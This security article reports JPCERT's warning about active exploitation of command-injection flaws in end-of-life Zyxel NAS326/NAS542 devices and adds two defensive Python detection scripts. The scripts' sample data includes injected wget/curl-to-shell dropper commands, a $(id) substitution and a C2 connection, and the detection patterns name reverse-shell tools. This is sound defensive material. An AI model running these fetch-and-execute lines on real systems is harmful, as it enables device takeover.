𝗝𝗣𝗖𝗘𝗥𝗧/𝗖𝗖 issued a nationwide warning after researchers observed attackers exploiting multiple command injection vulnerabilities in Zyxel NAS devices that many organizations still operate on internal and remote-accessible networks. These flaws, which affect end-of-life NAS models, now give threat actors direct paths to arbitrary command execution, full device takeover, and eventual entry into broader environments that depend on the compromised NAS units for storage or backups.
𝗧𝗵𝗲 𝗮𝗰𝘁𝗶𝘃𝗲 𝗲𝘅𝗽𝗹𝗼𝗶𝘁𝘀 appear widespread. Attackers rapidly scan vulnerable appliances, execute injected payloads, and deploy automation to maintain control. Because these devices often sit in trusted network zones, every successful compromise carries downstream risk to additional assets.
𝗝𝗣𝗖𝗘𝗥𝗧 confirmed exploitation of three specific vulnerabilities tracked as CVE-2024-29972, CVE-2024-29973, and CVE-2024-29974. These bugs affect the Zyxel NAS326 and NAS542, which reached end of vulnerability support at the end of 2023. Zyxel issued a one-off firmware hotfix for these three CVEs in June 2024 despite that status, but no further updates will follow, many units were never updated, and many organizations leave the NAS web interface exposed to the internet, so attackers now abuse these flaws aggressively.
𝗔𝗹𝗹 𝘁𝗵𝗿𝗲𝗲 𝗰𝗼𝗺𝗺𝗮𝗻𝗱 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝗯𝘂𝗴𝘀 allow unauthenticated attackers to feed crafted HTTP requests into the firmware’s CGI request handlers and execute arbitrary OS commands. No credentials are required at all, so any unit whose web interface is reachable is exploitable regardless of how carefully its accounts were configured. This makes these flaws ideal for botnet operators, cryptomining crews, and access brokers that sell footholds to ransomware affiliates.
𝐒𝐡𝐚𝐝𝐨𝐰𝐕𝟐-𝐬𝐭𝐲𝐥𝐞 𝐜𝐚𝐦𝐩𝐚𝐢𝐠𝐧𝐬 𝐚𝐫𝐞 𝐛𝐞𝐠𝐢𝐧𝐧𝐢𝐧𝐠 𝐭𝐨 𝐭𝐨𝐮𝐜𝐡 𝐭𝐡𝐞𝐬𝐞 𝐝𝐞𝐯𝐢𝐜𝐞𝐬, and researchers already link some exploitation waves to infrastructure associated with credential-harvesting and lateral-movement frameworks. While no single actor exclusively owns these vulnerabilities, the activity pattern resembles opportunistic, mass-scale harvesting designed to expand access inventories rapidly.
𝗔𝘁𝘁𝗮𝗰𝗸 𝘁𝗲𝗰𝗵𝗻𝗶𝗾𝘂𝗲: 𝗳𝗮𝘀𝘁 𝘀𝗰𝗮𝗻, 𝗳𝗮𝘀𝘁 𝗶𝗻𝗷𝗲𝗰𝘁, 𝗳𝗮𝘀𝘁 𝗽𝗲𝗿𝘀𝗶𝘀𝘁
𝗔𝗰𝘁𝗶𝘃𝗲 𝗲𝘅𝗽𝗹𝗼𝗶𝘁 𝗽𝗮𝘁𝘁𝗲𝗿𝗻𝘀 𝗝𝗣𝗖𝗘𝗥𝗧 𝗶𝘀 𝘀𝗲𝗲𝗶𝗻𝗴
Attackers aggressively hunt exposed NAS units by scanning for the vulnerable web endpoints. As soon as they identify a target, they inject commands that fetch remote payloads, create persistence through scheduled tasks or modified startup scripts, and open tunnels to external infrastructure. Because these NAS devices often store corporate data or backups, this foothold enables adversaries to harvest sensitive files and map adjacent network segments.
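The scan-and-inject stage described above leaves a recognizable trace in HTTP traffic. The following is an added example, not JPCERT’s or Zyxel’s code and not the real exploit requests for these CVEs: it scores request records as a reverse proxy or IDS in front of the NAS would capture them (including POST bodies, which the NAS’s own access log does not record) for shell metacharacters, fetch-then-execute chains, and origins outside an assumed trusted management subnet (TRUSTED_NETS), and extracts any payload URLs as indicators. The paths, addresses and bodies in SAMPLE_REQUESTS are constructed placeholders.

```python
"""Score HTTP requests to a NAS web interface for command-injection attempts.

Added example. Records are the kind a reverse proxy or IDS in front of
the NAS would log (method, path, body, source IP). Paths, bodies and
addresses in SAMPLE_REQUESTS are constructed placeholders, not the real
exploit requests for CVE-2024-29972/29973/29974.
"""
import re
from ipaddress import ip_address, ip_network
from urllib.parse import unquote, unquote_plus

# Assumed: only this subnet may reach the NAS management interface.
TRUSTED_NETS = [ip_network("10.0.5.0/24")]

# Shell metacharacters that have no business inside a NAS form parameter.
METACHARS = re.compile(r"[;|`]|\$\(|&&|\|\|")
# Download step of a typical mass-exploitation payload ...
FETCH = re.compile(r"\b(wget|curl|tftp|ftpget)\b[^;&|]*?(https?|ftp|tftp)://\S+", re.I)
# ... followed by making the dropper executable or handing it to a shell.
EXEC = re.compile(r"chmod\s+(\+x|[0-7]{3,4})|(^|[;|&])\s*(sh|bash)\b|\./[\w.-]+", re.I)
REMOTE_URL = re.compile(r"(https?|ftp|tftp)://[^\s'\";|&<>]+", re.I)


def decode(s: str) -> str:
    """URL-decode twice so a double-encoded %2526 still becomes '&'.

    The second pass uses unquote (not unquote_plus) so a literal '+' that
    the first pass produced, e.g. in 'chmod +x', is not turned into a space.
    """
    return unquote(unquote_plus(s))


def from_trusted(src: str) -> bool:
    try:
        addr = ip_address(src)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETS)


def analyze(req: dict) -> dict:
    """Return the reasons a request looks hostile; an empty list means clean."""
    path, body = decode(req.get("path", "")), decode(req.get("body", ""))
    reasons = []
    for label, part in (("path", path), ("body", body)):
        if METACHARS.search(part):
            reasons.append(f"shell metacharacters in {label}")
        if FETCH.search(part) and EXEC.search(part):
            reasons.append(f"fetch-then-execute chain in {label}")
    if not from_trusted(req.get("src", "")):
        reasons.append("request from outside trusted management subnets")
    urls = sorted({m.group(0) for m in REMOTE_URL.finditer(path + " " + body)})
    return {"src": req.get("src"), "path": req.get("path"),
            "reasons": reasons, "payload_urls": urls}


def triage(requests) -> list:
    """Keep only the requests that raised at least one reason."""
    return [r for r in map(analyze, requests) if r["reasons"]]


SAMPLE_REQUESTS = [  # constructed
    # benign admin login from the LAN
    {"src": "10.0.5.20", "method": "POST", "path": "/cgi-bin/example-cgi",
     "body": "username=admin&password=s3cret&remember=1"},
    # parameter breaks out into a shell, fetches a dropper into /tmp and runs it
    {"src": "203.0.113.77", "method": "POST", "path": "/cgi-bin/example-cgi",
     "body": "name=x%3Bwget+http%3A%2F%2F198.51.100.9%2Fx.sh+-O+%2Ftmp%2Fx.sh"
             "%3Bchmod+%2Bx+%2Ftmp%2Fx.sh%3B%2Ftmp%2Fx.sh"},
    # command substitution smuggled in a query parameter
    {"src": "203.0.113.78", "method": "GET",
     "path": "/cgi-bin/example-cgi?id=%24%28id%29", "body": ""},
    # benign share listing from the LAN
    {"src": "10.0.5.21", "method": "GET", "path": "/share/list?dir=/docs", "body": ""},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_REQUESTS):
        print(hit["src"], hit["path"], hit["reasons"], hit["payload_urls"])
```

The origin check matters as much as the content checks: JPCERT’s advice is that these units should not be reachable from outside the management network at all, so any request from an untrusted address is worth a ticket even when the payload is not recognized. The extracted payload URLs are the first indicators to block at the egress firewall and to search for across other hosts.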
𝗪𝗵𝘆 𝘁𝗵𝗲𝘀𝗲 𝗲𝗻𝗱-𝗼𝗳-𝗹𝗶𝗳𝗲 𝗱𝗲𝘃𝗶𝗰𝗲𝘀 𝗿𝗲𝗺𝗮𝗶𝗻 𝗵𝗶𝗴𝗵-𝘃𝗮𝗹𝘂𝗲
Although Zyxel retired support, many organizations continue to depend on these NAS systems because they sit deep within legacy workflows. Attackers understand this operational inertia. With no further patches coming, an unpatched unit offers an evergreen entry route. That combination makes them ideal for long-term exploitation, especially when the NAS stores internal documentation, VM images, intellectual property or unencrypted datasets.
𝗥𝗮𝗻𝘀𝗼𝗺𝘄𝗮𝗿𝗲 𝗴𝗿𝗼𝘂𝗽𝘀 𝗰𝗮𝗻 𝗮𝗯𝘂𝘀𝗲 𝗰𝗼𝗺𝗽𝗿𝗼𝗺𝗶𝘀𝗲𝗱 𝗡𝗔𝗦 𝘂𝗻𝗶𝘁𝘀 𝗮𝘀 𝗲𝗻𝘁𝗿𝘆 𝗽𝗼𝗶𝗻𝘁𝘀
Because threat actors frequently pair command injection with credential theft and network pivoting, these Zyxel NAS flaws offer a straightforward way to set the stage for ransomware. Once attackers gain a foothold, they often enumerate SMB shares, search for privileged accounts, and stage encryption tooling inside the trusted network. With NAS devices acting as storage hubs, ransomware operators can use them to move laterally or corrupt backups.
𝗝𝗣𝗖𝗘𝗥𝗧’𝘀 𝗮𝗱𝘃𝗶𝗰𝗲: 𝗶𝘀𝗼𝗹𝗮𝘁𝗲 𝗶𝗺𝗺𝗲𝗱𝗶𝗮𝘁𝗲𝗹𝘆
JPCERT urges organizations to remove NAS326 and NAS542 devices from external exposure, physically isolate them if necessary, and replace them with supported hardware. Although some defenders attempt to mitigate command injection by applying firewall rules or restricting known URLs, attackers typically bypass superficial blocking by leveraging alternate execution points or chaining multiple injection vectors.
𝗪𝗵𝘆 𝘁𝗵𝗶𝘀 𝗺𝗮𝘁𝘁𝗲𝗿𝘀 𝗳𝗼𝗿 𝗼𝗿𝗴𝗮𝗻𝗶𝘇𝗮𝘁𝗶𝗼𝗻𝘀 𝗶𝗻 𝟮𝟬𝟮𝟱
Organizations continue shifting toward hybrid infrastructures, and adversaries increasingly exploit overlooked appliances to bridge cloud and on-prem environments. Consequently, compromised NAS systems now create bidirectional risk: attackers can steal data from internal shares while using the NAS to exfiltrate cloud credentials or API keys stored within developer backups. Because many emerging campaigns focus on credential harvesting as a precursor to ransomware, every compromised NAS introduces strategic exposure that far exceeds the appliance’s original role.
FAQs
𝗤: 𝗛𝗼𝘄 𝗱𝗼 𝗜 𝗸𝗻𝗼𝘄 𝗶𝗳 𝗺𝘆 𝗡𝗔𝗦𝟯𝟮𝟲 𝗼𝗿 𝗡𝗔𝗦𝟱𝟰𝟮 𝗶𝘀 𝗰𝗼𝗺𝗽𝗿𝗼𝗺𝗶𝘀𝗲𝗱?
Check for unfamiliar running processes, unexpected cron entries, new or modified startup scripts, outbound connections the NAS has no reason to make, and unknown binaries in user shares or temporary directories. Because attackers also modify configuration files, any of these findings should trigger a full forensic review rather than an in-place cleanup, with the device treated as compromised until proven otherwise.
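One way to turn that checklist into a repeatable hunt, as an added example that is not JPCERT’s or Zyxel’s tooling: the script below parses copies of the artifacts the answer names (root crontab, startup scripts, and the socket table as printed by `netstat -an`) and flags entries carrying generic dropper and command-and-control indicators. TRUSTED_NETS is an assumed allow-list of the NAS’s legitimate peers, the indicator patterns are heuristics, and all sample data is constructed; on a real device you would feed in the actual command output.

```python
"""Hunt for persistence and C2 artifacts on a Linux-based NAS.

Added example, not JPCERT's or Zyxel's tooling. Parses copies of root
crontab, startup scripts and `netstat -an` output so it runs offline.
TRUSTED_NETS is an assumed allow-list; every sample below is constructed.
"""
import re
from ipaddress import ip_address, ip_network

# Assumed: the only subnet the NAS legitimately exchanges traffic with.
TRUSTED_NETS = [ip_network("10.0.5.0/24")]
# Writable locations where droppers usually land on an embedded Linux box.
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")
INDICATORS = [
    ("remote fetch", re.compile(r"\b(wget|curl|tftp|ftpget)\b", re.I)),
    ("url in command", re.compile(r"(https?|ftp|tftp)://", re.I)),
    ("pipe to shell", re.compile(r"\|\s*(sh|bash|ash)\b")),
    ("base64 decode", re.compile(r"base64\s+(-d|--decode)")),
    ("scratch-dir path", re.compile("|".join(re.escape(d) for d in SCRATCH_DIRS))),
    ("reverse shell", re.compile(r"/dev/tcp/|\bnc\b.*\s-e\s|\bncat\b")),
]


def indicators(command: str) -> list:
    """Names of every indicator pattern that fires on one command line."""
    return [name for name, rx in INDICATORS if rx.search(command)]


def cron_command(line: str):
    """Command part of a crontab line, or None for blank/comment/malformed."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):              # @reboot, @hourly, ...
        parts = line.split(None, 1)
        return parts[1] if len(parts) == 2 else None
    parts = line.split(None, 5)           # min hour dom mon dow command
    return parts[5] if len(parts) == 6 else None


def suspicious_cron(crontab: str) -> list:
    hits = []
    for line in crontab.splitlines():
        cmd = cron_command(line)
        if cmd and (why := indicators(cmd)):
            hits.append({"entry": line.strip(), "indicators": why})
    return hits


def suspicious_startup(scripts: dict) -> list:
    """scripts maps a startup script path (e.g. /etc/init.d/*) to its text."""
    hits = []
    for name, text in scripts.items():
        for line in text.splitlines():
            s = line.strip()
            if s and not s.startswith("#") and (why := indicators(s)):
                hits.append({"script": name, "line": s, "indicators": why})
    return hits


def outside_trusted(ip: str) -> bool:
    try:
        addr = ip_address(ip)
    except ValueError:                    # '*', hostnames, malformed
        return False
    return not any(addr in net for net in TRUSTED_NETS)


def suspicious_connections(netstat: str) -> list:
    """Live TCP sessions (ESTABLISHED/SYN_SENT) whose peer is outside TRUSTED_NETS."""
    hits = []
    for line in netstat.splitlines():
        f = line.split()
        if len(f) < 6 or f[0] != "tcp":   # IPv4 only in this example
            continue
        local, peer, state = f[3], f[4], f[5]
        peer_ip = peer.rpartition(":")[0]
        if state in ("ESTABLISHED", "SYN_SENT") and outside_trusted(peer_ip):
            hits.append({"local": local, "peer": peer, "state": state})
    return hits


def hunt(crontab: str, scripts: dict, netstat: str) -> dict:
    return {"cron": suspicious_cron(crontab),
            "startup": suspicious_startup(scripts),
            "connections": suspicious_connections(netstat)}


# constructed sample artifacts
SAMPLE_CRONTAB = """\
# root crontab
0 2 * * * /usr/sbin/backup --nightly
*/5 * * * * wget -q http://198.51.100.9/x.sh -O /tmp/.x && sh /tmp/.x
@reboot /tmp/.x
"""
SAMPLE_SCRIPTS = {
    "/etc/init.d/S50ntp": "#!/bin/sh\n/usr/sbin/ntpd -g\n",
    "/etc/init.d/S99local": "#!/bin/sh\n/usr/sbin/smbd -D\n"
                            "(curl -s http://198.51.100.9/b | sh) &\n",
}
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 10.0.5.30:445           10.0.5.20:51234         ESTABLISHED
tcp        0      0 10.0.5.30:38812         198.51.100.9:4444       ESTABLISHED
tcp        0      0 10.0.5.30:41222         203.0.113.5:443         TIME_WAIT
"""

if __name__ == "__main__":
    for section, hits in hunt(SAMPLE_CRONTAB, SAMPLE_SCRIPTS, SAMPLE_NETSTAT).items():
        print(section, hits)
```

A hit is a lead, not a verdict: a legitimate backup job may well pull from an internal HTTP server, so review each finding against the device’s known configuration. Preserve the original files, the process list and a packet capture before cleaning anything, because the cron entry and the startup script are exactly the evidence a later forensic review will need.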
𝗤: 𝗖𝗮𝗻 𝗜 𝗺𝗶𝘁𝗶𝗴𝗮𝘁𝗲 𝘁𝗵𝗲𝘀𝗲 𝗳𝗹𝗮𝘄𝘀 𝘄𝗶𝘁𝗵𝗼𝘂𝘁 𝗿𝗲𝗽𝗹𝗮𝗰𝗶𝗻𝗴 𝘁𝗵𝗲 𝗱𝗲𝘃𝗶𝗰𝗲?
Replacement remains the only reliable long-term path. Zyxel did publish a hotfix for these three CVEs in June 2024, and units still running older firmware should receive it while a replacement is planned, but no further fixes will follow for any later flaw. Network isolation lowers exposure, yet determined attackers still find paths to execution if the device stays reachable.
𝗤: 𝗪𝗵𝘆 𝗱𝗼 𝗮𝘁𝘁𝗮𝗰𝗸𝗲𝗿𝘀 𝘁𝗮𝗿𝗴𝗲𝘁 𝗲𝗻𝗱-𝗼𝗳-𝘀𝘂𝗽𝗽𝗼𝗿𝘁 𝗵𝗮𝗿𝗱𝘄𝗮𝗿𝗲?
Attackers value predictable, unpatchable systems because each one provides a guaranteed entry point. As defenders retire other vulnerable equipment, EoL storage appliances now represent high-value footholds.